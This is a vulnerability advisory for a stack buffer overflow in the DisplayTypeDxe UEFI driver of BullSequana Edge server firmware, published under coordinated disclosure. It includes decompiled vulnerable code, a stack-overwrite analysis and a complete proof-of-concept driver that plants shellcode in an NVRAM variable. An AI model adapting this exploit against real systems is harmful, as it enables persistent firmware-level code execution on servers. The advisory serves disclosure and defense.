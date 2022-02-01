[BRLY-2021-021] The stack buffer overflow vulnerability leads to arbitrary code execution in UEFI DXE driver on BullSequana Edge server.
Summary
BINARLY efiXplorer team has discovered a stack overflow vulnerability that allows a local priviledged user to access UEFI DXE driver and execute arbitrary code.
Vulnerability Information
- BINARLY internal vulnerability identifier: BRLY-2021-021
- CERT/CC assigned case number: VU#796611
- Insyde PSIRT assigned CVE identifier: CVE-2021-42059
- CVSS v3.1: 8.2 High AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Affected BullSequana Edge servers firmwares with confirmed impact by Binarly team
|Package
|Driver name
|Driver MD5
|File GUID
|BIOS_SKD080.18.02.003.sign.tar.gz
|DisplayTypeDxe
|581ff20fcd4307b0193fdc3eaa3898d0
|A2760074-ED4C-4719-8382-C942CBF16D85
Potential impact
An attacker with local privileged access can exploit this vulnerability to elevate privileges from ring 3 or ring 0 (depends on the operating system) to DXE Runtime UEFI application and execute arbitrary code. A malicious code installed as a result of the vulnerability exploitation in DXE driver could survive across an operating system (OS) boot process and runtime or modify NVRAM area on SPI flash storage (to gain persistence on target platform). Additionally, this vulnerability potentially could be used by a threat actors to bypass OS security mechanisms (modify privileged memory or runtime variables), influence on OS boot process, and in some cases would allow an attacker to hook or modify EFI Runtime services.
Vulnerability description
Vulnerability exists in function located at offset
0xA20 in
DisplayTypeDxe driver.
EFI_STATUS __fastcall GetPrimaryDisplay(_BYTE *res)
{
EFI_STATUS result; // rax
char PrimaryDisplayValue; // [rsp+40h] [rbp+8h] BYREF
UINTN DataSize; // [rsp+48h] [rbp+10h] BYREF
if ( !res )
return EFI_INVALID_PARAMETER;
DataSize = 0i64;
*res = 1;
result = gRT_2F28->GetVariable(
L"PrimaryDisplay",
&EFI_GENERIC_VARIABLE_GUID_2DE0,
0i64,
&DataSize,
&PrimaryDisplayValue);
if ( result == EFI_BUFFER_TOO_SMALL )
result = gRT_2F28->GetVariable(
L"PrimaryDisplay",
&EFI_GENERIC_VARIABLE_GUID_2DE0,
0i64,
&DataSize,
&PrimaryDisplayValue);
if ( (result & 0x8000000000000000ui64) == 0i64 )
{
if ( (PrimaryDisplayValue & 0xFB) != 0 )
{
if ( ((PrimaryDisplayValue - 1) & 0xFD) != 0 )
{
if ( PrimaryDisplayValue == 2 )
*res = 2;
}
else
{
*res = 1;
}
}
else
{
*res = 0;
}
return 0i64;
}
return result;
}
The vulnerability exists due to incorrect use of the
gRT->GetVariable() service:
- after the first call to
gRT->GetVariable(), the value of the
DataSizelocal variable will be updated (
DataSizewill contain the size of the value of the
PrimaryDisplayNVRAM variable)
- after the second call to
gRT->GetVariable(), the value of the
PrimaryDisplayValuelocal variable will be updated (
PrimaryDisplayValuewill contain the value of the
PrimaryDisplayNVRAM variable)
- if value of the
PrimaryDisplayNVRAM variable more than 1 byte, a stack overflow may occur, followed by execution of arbitrary code
Exploitation
Below is a section of the stack for the function under consideration:
...
+0000000000000000 r db 8 dup(?)
+0000000000000008 PrimaryDisplayValue db ?
+0000000000000009 db ? ; undefined
+000000000000000A db ? ; undefined
+000000000000000B db ? ; undefined
+000000000000000C db ? ; undefined
+000000000000000D db ? ; undefined
+000000000000000E db ? ; undefined
+000000000000000F db ? ; undefined
+0000000000000010 DataSize dq ?
+0000000000000018
+0000000000000018 ; end of stack variables
...
The
PrimaryDisplayValue is higher than the return address value (
r), so we cannot overwrite the return address of the current function, but we can overwrite the return address of the parent function.
The state of the stack under debug is shown below:
|Stack address
|Description
|
0x7ea34c8
|return address of the current function (
0x662581f)
|
0x7ea34d0
|
PrimaryDisplayValue
|
0x7ea34d8
|
DataSize
|
0x7ea34f8
|return address of the parent function (
0x66253c8)
Thus, if the value of the
PrimaryDisplayValue NVRAM variable is greater than 48 bytes, you can completely overwrite the return address of the parent function and execute arbitrary code.
Proof of concept
Below is the source code of the driver that we wrote to change the value of the
PrimaryDisplay NVRAM variable.
#include <Uefi.h>
#include <Library/DebugLib.h>
#include <Library/UefiBootServicesTableLib.h>
#include <Library/UefiRuntimeServicesTableLib.h>
#include <Library/UefiRuntimeLib.h>
EFI_GUID gEfiGenericVariableGuid = {0x59d1c24f, 0x50f1, 0x401a, {0xb1, 0x01, 0xf3, 0x3e, 0x0d, 0xae, 0xd4, 0x43}};
/**
* @brief The module entry point.
*/
EFI_STATUS
EFIAPI
SetPrimaryDisplayEntryPoint(
IN EFI_HANDLE ImageHandle,
IN EFI_SYSTEM_TABLE *SystemTable)
{
EFI_STATUS Status;
UINTN DataSize = 145;
UINT8 Data[] = {
// some data (40 bytes)
0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65, 0x65,
// shellcode address on stack (return address for parent function)
0x00, 0x35, 0xea, 0x07, 0x00, 0x00, 0x00, 0x00,
// shellcode start
0xb8, 0x18, 0xe0, 0x9e, 0x07, 0xba, 0x02, 0x00,
0x00, 0x00, 0x4c, 0x8b, 0x40, 0x40, 0x4c, 0x89,
0xc1, 0x41, 0xff, 0x50, 0x28, 0xb8, 0x18, 0xe0,
0x9e, 0x07, 0xba, 0x31, 0x35, 0xea, 0x07, 0x4c,
0x8b, 0x40, 0x40, 0x4c, 0x89, 0xc1, 0x41, 0xff,
0x50, 0x08, 0xeb, 0xfc, 0x90, 0x90, 0x90, 0x90,
0x90, 0x53, 0x00, 0x75, 0x00, 0x63, 0x00, 0x63,
0x00, 0x65, 0x00, 0x73, 0x00, 0x73, 0x00, 0x66,
0x00, 0x75, 0x00, 0x6c, 0x00, 0x6c, 0x00, 0x79,
0x00, 0x20, 0x00, 0x65, 0x00, 0x78, 0x00, 0x70,
0x00, 0x6c, 0x00, 0x6f, 0x00, 0x69, 0x00, 0x74,
0x00, 0x65, 0x00, 0x64, 0x00, 0x10, 0x00, 0x00,
0x00};
Status = gRT->SetVariable(L"PrimaryDisplay",
&gEfiGenericVariableGuid,
EFI_VARIABLE_NON_VOLATILE | EFI_VARIABLE_BOOTSERVICE_ACCESS | EFI_VARIABLE_RUNTIME_ACCESS,
DataSize,
&Data);
DebugPrint(DEBUG_INFO,
"Setting PrimaryDisplay variable: GUID = %g, Size = %08x, Status = %r\n",
gEfiGenericVariableGuid,
DataSize,
Status);
return Status;
}
/**
* @brief Handles unload request of this module.
*/
EFI_STATUS
EFIAPI
SetPrimaryDisplayUnload(
IN EFI_HANDLE ImageHandle)
{
return EFI_SUCCESS;
}
After the value of the NVRAM variable is set, the
DisplayTypeDxe driver will always execute the shellcode. In this case, the shellcode displays the message "Successfully exploited".
Disclosure timeline
This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public.
|Disclosure Activity
|Date
|CERT/CC created a case
|2021-09-27
|Insyde PSIRT confirmed issue
|2021-09-29
|Insyde PSIRT assigned CVE number
|2021-11-03
|Insyde PSIRT provide patch release
|2021-11-09
|BINARLY public disclosure date
|2022-02-01
Acknowledgements
BINARLY efiXplorer team